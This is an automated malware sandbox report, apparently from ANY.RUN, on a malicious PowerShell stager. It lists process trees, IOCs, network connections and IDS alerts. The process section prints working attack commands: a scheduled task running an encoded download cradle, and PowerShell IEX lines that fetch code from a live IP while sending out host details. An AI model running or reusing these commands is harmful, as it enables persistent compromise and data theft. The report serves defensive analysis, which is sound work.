analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

p

Full analysis: https://app.any.run/tasks/776b97c3-69d0-423f-8619-bed500b441b2
Verdict: Malicious activity
Analysis date: October 20, 2020, 09:56:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines
MD5:

47DEE8020B2CF7336173C54AB6A71033

SHA1:

8C2572F97C3BB2D3D8CB2156596318AD12290831

SHA256:

9558FA57CE3C589061403A2F847136ECD03E9C785C57F25188ED1FA1D256F887

SSDEEP:

48:1ffilIypT0yuuQRivHi/WDV2b9rKN5Wrhe:slxpvpHiODV2b9YArhe

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3340)
      • schtasks.exe (PID: 1656)

    • Uses Task Scheduler to run other applications

      • powershell.exe (PID: 3536)

    • Executes PowerShell scripts

      • cmd.exe (PID: 540)

    • Starts Visual C# compiler

      • powershell.exe (PID: 2496)

    • Changes settings of System certificates

      • powershell.exe (PID: 2496)

  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3536)
      • powershell.exe (PID: 2496)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 3536)

    • PowerShell script executed

      • powershell.exe (PID: 3536)

    • Uses IPCONFIG.EXE to discover IP address

      • powershell.exe (PID: 2496)

    • Uses NETSTAT.EXE to discover network connections

      • powershell.exe (PID: 2496)

    • Adds / modifies Windows certificates

      • powershell.exe (PID: 2496)

  • INFO

    • Manual execution by user

      • NOTEPAD.EXE (PID: 3912)
      • explorer.exe (PID: 3848)
      • powershell.exe (PID: 3536)
      • NOTEPAD.EXE (PID: 1968)

    • Reads settings of System Certificates

      • powershell.exe (PID: 2496)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
68
Monitored processes
20
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start rundll32.exe no specs notepad.exe no specs powershell.exe getmac.exe no specs schtasks.exe no specs schtasks.exe no specs cmd.exe no specs powershell.exe csc.exe cvtres.exe no specs explorer.exe no specs notepad.exe no specs notepad.exe no specs getmac.exe no specs ipconfig.exe no specs ipconfig.exe no specs netstat.exe no specs ipconfig.exe no specs ipconfig.exe no specs netstat.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2064"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\pC:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2512"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\pC:\Windows\system32\NOTEPAD.EXErundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3536"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
4294967295
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3224"C:\Windows\system32\getmac.exe" /FO CSVC:\Windows\system32\getmac.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Displays NIC MAC information
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3340"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 45 /tn Winnet /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYwBkAG4ALgBjAGgAYQB0AGMAZABuAC4AbgBlAHQALwBwAD8AaABpAGcAMgAwADEAMAAyADAAJwApAA==" /F C:\Windows\system32\schtasks.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1656"C:\Windows\system32\schtasks.exe" /run /tn WinnetC:\Windows\system32\schtasks.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Manages scheduled tasks
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
540"C:\Windows\system32\cmd.exe" /c powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).downloadstring('http://188.166.162.201/update.png?&mac=12-A9-86-6C-77-DE&av=&version=6.1.7601&bit=32-bit&flag2=False&domain=WORKGROUP&user=admin&PS=True')" C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2496powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).downloadstring('http://188.166.162.201/update.png?&mac=12-A9-86-6C-77-DE&av=&version=6.1.7601&bit=32-bit&flag2=False&domain=WORKGROUP&user=admin&PS=True')" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4072"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\ux6-qudl.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
3112C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES996.tmp" "c:\Users\admin\AppData\Local\Temp\CSC995.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
Total events
1 160
Read events
949
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
3536powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\64XS4DZO84M13YEYE0TN.temp
MD5:
SHA256:
2496powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2T2UP1YI02OIOA9JQ34B.temp
MD5:
SHA256:
4072csc.exeC:\Users\admin\AppData\Local\Temp\CSC995.tmp
MD5:
SHA256:
4072csc.exeC:\Users\admin\AppData\Local\Temp\ux6-qudl.pdb
MD5:
SHA256:
3112cvtres.exeC:\Users\admin\AppData\Local\Temp\RES996.tmp
MD5:
SHA256:
4072csc.exeC:\Users\admin\AppData\Local\Temp\ux6-qudl.dll
MD5:
SHA256:
4072csc.exeC:\Users\admin\AppData\Local\Temp\ux6-qudl.out
MD5:
SHA256:
2496powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2df8cc.TMPbinary
MD5:D6EE8C34E4C28999F00E385C8808E7DE
SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
2496powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:D6EE8C34E4C28999F00E385C8808E7DE
SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
2496powershell.exeC:\Users\admin\AppData\Local\Temp\ux6-qudl.cmdlinetext
MD5:5C1F261FB7296EBE84B9B10BE57D3379
SHA256:0D21623E5B64B29B6A22528ECEE9B44F32458B879C68DB3473FD859103BF42D3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
1 783
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2496
powershell.exe
GET
200
188.166.162.201:80
http://188.166.162.201/update.png?&mac=12-A9-86-6C-77-DE&av=&version=6.1.7601&bit=32-bit&flag2=False&domain=WORKGROUP&user=admin&PS=True
DE
text
2.31 Mb
malicious
2496
powershell.exe
GET
200
188.166.162.201:80
http://p.estonine.com/getnew.php?ver=2020&mac=12-A9-86-6C-77-DE&re=0&pid=2496&av=&ver=6.1.7601&bit=32-bit
DE
text
2 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2496
powershell.exe
188.166.162.6:445
Digital Ocean, Inc.
DE
unknown
2496
powershell.exe
188.166.162.4:445
Digital Ocean, Inc.
DE
unknown
2496
powershell.exe
188.166.162.9:445
Digital Ocean, Inc.
DE
unknown
2496
powershell.exe
188.166.162.2:445
Digital Ocean, Inc.
DE
unknown
2496
powershell.exe
188.166.162.7:445
Digital Ocean, Inc.
DE
unknown
2496
powershell.exe
188.166.162.1:445
Digital Ocean, Inc.
DE
suspicious
2496
powershell.exe
23.21.126.66:443
api.ipify.org
Amazon.com, Inc.
US
suspicious
2496
powershell.exe
188.166.162.3:445
Digital Ocean, Inc.
DE
unknown
2496
powershell.exe
188.166.162.201:80
p.estonine.com
Digital Ocean, Inc.
DE
malicious
2496
powershell.exe
188.166.162.5:445
Digital Ocean, Inc.
DE
unknown

DNS requests

Domain
IP
Reputation
p.estonine.com
  • 188.166.162.201
malicious
api.ipify.org
  • 23.21.126.66
  • 54.204.14.42
  • 174.129.214.20
  • 50.17.193.91
  • 54.225.169.28
  • 54.235.83.248
  • 23.21.109.69
  • 50.19.252.36
shared

Threats

PID
Process
Class
Message
2496
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] PowerShell.Siggen.22
2496
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] PowerShell.MemoryStream.Stager
2496
powershell.exe
Misc activity
AV MALWARE Suspicious Powershell Script embedded in Inbound Image 3
2496
powershell.exe
Misc activity
SUSPICIOUS [PTsecurity] ipify.org External IP Check
2496
powershell.exe
Misc activity
SUSPICIOUS [PTsecurity] ipify.org External IP Check
2496
powershell.exe
Misc activity
SUSPICIOUS [PTsecurity] ipify.org External IP Check
2496
powershell.exe
Misc activity
SUSPICIOUS [PTsecurity] ipify.org External IP Check
2496
powershell.exe
Misc activity
SUSPICIOUS [PTsecurity] ipify.org External IP Check
2496
powershell.exe
Misc activity
SUSPICIOUS [PTsecurity] ipify.org External IP Check
2496
powershell.exe
Misc activity
SUSPICIOUS [PTsecurity] ipify.org External IP Check
2 ETPRO signatures available at the full report
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
p